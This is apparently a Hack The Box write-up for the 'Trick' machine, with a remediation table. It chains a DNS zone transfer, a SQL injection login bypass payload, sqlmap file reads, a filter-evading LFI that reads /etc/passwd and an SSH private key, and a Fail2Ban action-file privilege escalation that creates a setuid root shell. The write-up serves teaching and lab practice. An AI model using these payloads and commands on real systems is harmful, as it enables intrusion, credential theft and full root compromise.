Trick — DNS Zone Transfer to Fail2Ban Privilege Escalation
Introduction
Trick is an Easy-rated Linux machine from Hack The Box that chains several common, individually modest weaknesses into a complete attack path ending in root access.
The compromise starts with a misconfigured DNS server that allows zone transfers, exposing hidden subdomains. One of those subdomains hosts a vulnerable payroll application affected by SQL Injection, allowing authentication bypass and credential disclosure. The SQL Injection can then be leveraged further through the database user’s FILE privilege to read sensitive server files and discover an additional virtual host.
That second application contains a Local File Inclusion vulnerability, ultimately leading to the disclosure of an SSH private key and user access. Finally, a misconfigured Fail2Ban installation combined with excessive sudo permissions allows privilege escalation to root.
Attack Overview
[DNS Zone Transfer]
↓
[Discover preprod-payroll.trick.htb]
↓
[SQL Injection Authentication Bypass]
↓
[Credential Disclosure]
↓
[SQLMap FILE Read]
↓
[Discover preprod-marketing.trick.htb]
↓
[Local File Inclusion]
↓
[SSH Private Key Disclosure]
↓
[SSH Access as michael]
↓
[Fail2Ban Misconfiguration]
↓
[Root Access]
Initial Enumeration
As usual, the first step is identifying exposed services.
sudo nmap -sC -sV -p- --min-rate 5000 -oA nmap/full 10.129.227.180
Results
| Port | Service |
|---|---|
| 22 | SSH |
| 25 | SMTP |
| 53 | DNS |
| 80 | HTTP |
The DNS server immediately stands out: nmap only scans TCP here, and TCP/53 being open is exactly what a zone transfer (AXFR) needs, so DNS becomes the initial entry point.
SMTP User Enumeration
The SMTP service can be queried manually using the VRFY command.
nc -nv 10.129.227.180 25
VRFY root
VRFY admin
VRFY mysql
The reply code tells the two cases apart: a 250/252 reply means the server accepted the name, while 550 means the local recipient is unknown. Probing a handful of common names this way shows that accounts such as root and mysql exist on the system. This is not directly exploitable, but a confirmed list of local usernames is useful later (for example when guessing SSH or application logins). Check one deliberately bogus name first, since some servers answer 252 for every name and then the results mean nothing.
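The VRFY probing above, scripted as an added example (this is not code from the original writeup). It uses Python's standard smtplib, which has a verify() method that sends VRFY and returns the reply code. The target address, the candidate names and the bogus canary name are assumptions; the canary check guards against servers that answer 252 for everything.

```python
# Added example: SMTP VRFY user enumeration with reply-code classification.
# Not part of the original writeup; host/port and name list are assumptions.
import smtplib


def classify_vrfy(code: int) -> str:
    """Map an SMTP VRFY reply code to what it says about the account.

    250  mailbox confirmed
    252  name accepted but not confirmed (many MTAs answer 252 for real
         local users; some answer 252 for any name, hence the canary check)
    550  unknown local recipient
    5xx command errors (500-504) mean VRFY is disabled or unsupported
    """
    if code == 250:
        return "exists"
    if code == 252:
        return "probably-exists"
    if code == 550:
        return "unknown"
    if code in (500, 501, 502, 503, 504):
        return "vrfy-unsupported"
    return "unclear"


def vrfy_users(host, names, port=25, timeout=5, canary="zz-no-such-user-zz"):
    """Return {name: (code, verdict)} plus a flag saying whether the results
    are trustworthy. The canary is a name that should not exist; if the
    server accepts it, every "probably-exists" verdict is meaningless."""
    results = {}
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        canary_code, _ = smtp.verify(canary)
        reliable = classify_vrfy(canary_code) in ("unknown", "unclear")
        if classify_vrfy(canary_code) == "vrfy-unsupported":
            return results, False
        for name in names:
            code, _ = smtp.verify(name)
            results[name] = (code, classify_vrfy(code))
    return results, reliable


if __name__ == "__main__":
    # Assumed target and wordlist; adjust to the engagement.
    users, reliable = vrfy_users("10.129.227.180", ["root", "admin", "mysql", "michael"])
    for name, (code, verdict) in users.items():
        print(f"{name:10s} {code} {verdict}")
    if not reliable:
        print("server accepted the canary name; treat verdicts as unreliable")
```

The canary result matters more than any single hit: a 252 for the canary means the server is not distinguishing users, and the whole run should be discarded rather than reported.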
Web Enumeration
The target hostname is added locally:
echo "10.129.227.180 trick.htb" | sudo tee -a /etc/hosts
Browsing to the website reveals only a generic “Coming Soon” Bootstrap page.
Directory enumeration and virtual host fuzzing do not reveal anything interesting. When fuzzing the Host header, filter out the size of the default "Coming Soon" response with ffuf's -fs option; otherwise every candidate name returns that same page and shows up as a match.
ffuf -u http://trick.htb/FUZZ \
-w wordlist.txt
ffuf -u http://trick.htb/ \
-H "Host: FUZZ.trick.htb" \
-w subdomains.txt
Since the web application appears intentionally sparse, attention shifts toward the DNS service.
DNS Zone Transfer
A DNS zone transfer (AXFR) is how a secondary DNS server replicates a zone from the primary; it runs over TCP port 53, which is why the open TCP/53 above matters. A correctly configured server only answers AXFR requests from its designated secondaries. If the restriction is missing, anyone can pull the entire zone and enumerate every record in it, including hostnames that are never linked from the public site.
Testing for AXFR:
dig axfr @10.129.227.180 trick.htb
The transfer succeeds and reveals an additional hostname:
preprod-payroll.trick.htb
After updating the hosts file:
echo "10.129.227.180 preprod-payroll.trick.htb" | sudo tee -a /etc/hosts
a payroll application becomes accessible.
SQL Injection Authentication Bypass
The payroll application presents a login form vulnerable to SQL injection.
Using a classic authentication bypass payload as the username:
admin' OR 1=1-- -
The single quote closes the username string, OR 1=1 makes the WHERE clause true for every row, and the comment (MySQL requires whitespace after --, hence the trailing -) discards the password check that follows. The query therefore matches the first user in the table and authentication succeeds without knowledge of valid credentials.
Once authenticated, inspecting user profiles reveals a password embedded directly within the HTML source:
<input type="password" value="SuperGucciRainbowCake">
Changing the input type to text exposes the password.
Enemigosss : SuperGucciRainbowCake
These credentials do not work for SSH, but they give SQLMap a valid, non-error baseline request for the login endpoint, which makes its detection of the injection in the username parameter more reliable.
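To make the bypass concrete, here is the vulnerable pattern next to its fix, written as an added example rather than the payroll application's real code. It uses an in-memory SQLite database with a constructed users table (the username from the page, a made-up password), and the same payload as above; SQLite honours the -- comment the same way MySQL does.

```python
# Added example: string-built login query (bypassable) vs parameterized query.
# Constructed sample data; not the payroll application's own code.
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed row: the page's username with an invented password.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("Enemigosss", "example-password"))
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """Mirrors a PHP login that concatenates request parameters into SQL."""
    return ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    # The payload admin' OR 1=1-- - turns the statement into
    #   ... WHERE username = 'admin' OR 1=1-- -' AND password = '...'
    # and the password check is commented away.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    # Placeholders send the values separately from the SQL text, so the quote
    # and comment in the payload are just characters inside a string.
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = setup_db()
    payload = "admin' OR 1=1-- -"
    print(build_vulnerable_query(payload, "x"))
    print("vulnerable:", login_vulnerable(db, payload, "x"))
    print("safe:      ", login_safe(db, payload, "x"))
```

The parameterized version is not "sanitizing" anything; it keeps data out of the query text entirely, which is why the same payload simply fails to match a user.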
SQLMap FILE Privilege Abuse
SQLMap confirms the injection point and identifies the privileges assigned to the database user.
sqlmap \
-u "http://preprod-payroll.trick.htb/ajax.php?action=login" \
--data="username=Enemigosss&password=SuperGucciRainbowCake" \
-p username \
--privileges \
--batch
The database user possesses the following privilege:
FILE
This privilege lets the database user call LOAD_FILE() and read files from the underlying operating system. Two conditions still apply: the file must be readable by the account the mysqld process runs as, and MySQL's secure_file_priv must not restrict file access (it is empty or unset here, since the read below succeeds).
Reading the Nginx configuration:
sqlmap \
-u "http://preprod-payroll.trick.htb/ajax.php?action=login" \
--data="username=Enemigosss&password=SuperGucciRainbowCake" \
-p username \
--file-read="/etc/nginx/sites-enabled/default" \
--batch
reveals another hidden virtual host:
preprod-marketing.trick.htb
Relevant configuration (fastcgi_pass belongs inside a PHP location block; shown here in that form):
server {
    listen 80;
    server_name preprod-marketing.trick.htb;
    root /var/www/market;
    index index.php;

    location ~ \.php$ {
        # PHP requests are handed to a dedicated php-fpm pool socket
        fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
    }
}
The socket name indicates a dedicated php-fpm pool for this site, almost certainly running as the user michael (the pool's user is set in its config under /etc/php/7.3/fpm/pool.d/, which could be confirmed with another file read). Whatever PHP code this vhost executes will therefore run with michael's file permissions.
The new hostname is added:
echo "10.129.227.180 preprod-marketing.trick.htb" | sudo tee -a /etc/hosts
Local File Inclusion
The marketing application exposes the following URL structure:
/index.php?page=services.html
A page parameter that names a file to include is the classic shape of a Local File Inclusion vulnerability.
A traditional traversal attempt fails:
?page=../../../etc/passwd
The failure pattern is telling: the application strips ../ from the parameter, which leaves etc/passwd and resolves to a nonexistent file under the web root. The filter is applied only once, so a sequence that collapses into ../ after a single removal gets through:
?page=....//....//....//etc/passwd
Removing ../ from ....// leaves ../, and the application returns the contents of /etc/passwd.
Among the listed users:
michael:x:1001:1001::/home/michael:/bin/bash
The next logical target is Michael’s SSH key.
?page=....//....//....//home/michael/.ssh/id_rsa
The application discloses the private key.
-----BEGIN OPENSSH PRIVATE KEY-----
[redacted]
-----END OPENSSH PRIVATE KEY-----
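The filter behaviour above, modelled as an added example (not the marketing application's own PHP). It shows why the plain traversal fails, why ....// survives a single-pass strip, why even a recursive strip is the wrong fix, and what a hardened include looks like. The web root path and allowlist entries are assumptions.

```python
# Added example: modelling the once-only "../" strip and a hardened include.
# Not the application's real code; web root and allowlist are assumptions.
import os

WEBROOT = "/var/www/market"
ALLOWED_PAGES = {"index.html", "services.html", "about.html"}  # assumed


def strip_traversal_once(page: str) -> str:
    """Equivalent of a single str_replace('../', '', $page).
    '....//' loses one '../' from its middle and becomes '../'."""
    return page.replace("../", "")


def strip_traversal_recursive(page: str) -> str:
    """Repeat until nothing is left. Harder to bypass, but still a denylist:
    absolute paths, encoded dots and wrappers like php://filter are untouched."""
    while "../" in page:
        page = page.replace("../", "")
    return page


def include_vulnerable(page: str, webroot: str = WEBROOT) -> str:
    """Path the vulnerable application ends up opening."""
    return os.path.normpath(os.path.join(webroot, strip_traversal_once(page)))


def include_hardened(page: str, webroot: str = WEBROOT) -> str:
    """Allowlist first; then confine the resolved path to the web root as a
    second layer, so a mistake in the allowlist still cannot escape it."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist")
    target = os.path.normpath(os.path.join(webroot, page))
    if os.path.commonpath([webroot, target]) != webroot:
        raise ValueError("path escapes web root")
    return target


if __name__ == "__main__":
    for p in ("../../../etc/passwd", "....//....//....//etc/passwd"):
        print(f"{p!r:40s} -> {include_vulnerable(p)}")
    print(include_hardened("services.html"))
```

Running it shows the naive attempt resolving inside /var/www/market (the "fails" case) and the ....// form resolving to /etc/passwd. The hardened version rejects both before any path is built.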
User Access
After saving the key locally:
chmod 600 michael.key
ssh -i michael.key michael@trick.htb
SSH access is obtained as michael.
The user flag can then be retrieved.
cat user.txt
[redacted]
User access obtained.
Privilege Escalation
Enumeration
Checking sudo permissions:
sudo -l
Output:
(root) NOPASSWD: /etc/init.d/fail2ban restart
Checking group membership:
id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
Inspecting the Fail2Ban action directory:
ls -la /etc/fail2ban/action.d/
reveals that the directory is group-writable by security. The files inside may still be root-owned, but write permission on the directory is enough to rename, delete and recreate them.
Since michael belongs to that group and can restart Fail2Ban as root, the attack path is clear: drop a malicious action definition into the directory, then restart the service so root executes it.
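The permission check above, generalised into an added example (not from the original writeup) that lists every directory or file under a tree that the current user's groups, or everyone, can write to. It is the check to run under /etc/fail2ban, /etc/init.d or any other path a sudo rule points at; the default root path is an assumption.

```python
# Added example: find entries under a tree writable via group or world bits.
# Not part of the original writeup; the default root is an assumption.
import os
import stat


def writable_entries(root, gids, uid=None):
    """Return [(path, reason)] for entries a user with these gids (and
    optionally this uid) could write. Symlinks are skipped: their mode
    bits are meaningless and the target is checked in its own right."""
    candidates = [root]
    for dirpath, dirnames, filenames in os.walk(root):
        candidates.extend(os.path.join(dirpath, n) for n in dirnames + filenames)
    hits = []
    for path in candidates:
        try:
            st = os.lstat(path)
        except OSError:
            continue
        if stat.S_ISLNK(st.st_mode):
            continue
        mode = st.st_mode
        if uid is not None and st.st_uid == uid and mode & stat.S_IWUSR:
            hits.append((path, "owner"))
        elif mode & stat.S_IWGRP and st.st_gid in gids:
            hits.append((path, "group"))
        elif mode & stat.S_IWOTH:
            hits.append((path, "world"))
    return hits


if __name__ == "__main__":
    # Assumed target directory; use the user's real supplementary groups.
    for path, why in writable_entries("/etc/fail2ban", set(os.getgroups()), os.getuid()):
        print(f"{why:5s} {path}")
```

A "group" hit on a directory is the important one here: even with every file inside owned by root and mode 644, the directory entry can be replaced, which is exactly what the exploitation step below relies on.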
Exploitation
A malicious action file is created:
cat << EOF > /tmp/iptables-multiport.conf
[Definition]
actionstart = cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
actionstop =
actioncheck =
actionban =
actionunban =
EOF
The original action definition is replaced. If the existing file is root-owned and not writable, copying over it fails with "Permission denied"; write access on the directory still allows renaming or deleting the original first (for example with mv), after which the new file can be dropped in:
cp /tmp/iptables-multiport.conf \
/etc/fail2ban/action.d/iptables-multiport.conf
Fail2Ban is restarted:
sudo /etc/init.d/fail2ban restart
When the sshd jail starts, Fail2Ban runs actionstart as root, creating a setuid copy of bash. Confirm with ls -l that /tmp/rootbash is owned by root and shows the s bit (-rwsr-xr-x) before relying on it.
Executing it with -p, which tells bash not to drop the elevated effective UID back to the real UID:
/tmp/rootbash -p
provides a root shell.
whoami
root
The root flag can then be read.
cat /root/root.txt
[redacted]
Root access obtained.
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| DNS Zone Transfer | AXFR allowed from arbitrary hosts | Restrict zone transfers to trusted DNS servers |
| SQL Injection | Unsanitized user input in SQL queries | Use parameterized queries and prepared statements |
| Credential Disclosure | Password exposed in HTML source | Never expose secrets client-side |
| Local File Inclusion | User-controlled file inclusion | Implement strict allowlists and input validation |
| Fail2Ban Privilege Escalation | Group-writable action.d directory combined with a sudo rule that restarts the service as root | Keep /etc/fail2ban root-owned and non-writable by unprivileged groups; never grant sudo restart on a service whose configuration a user can influence |
Resources
- Nmap — Network scanning and service detection
- FFUF — Directory and virtual host fuzzing
- SQLMap — Automated SQL injection exploitation
- BIND / dig — DNS enumeration and zone transfers
- Fail2Ban — Intrusion prevention framework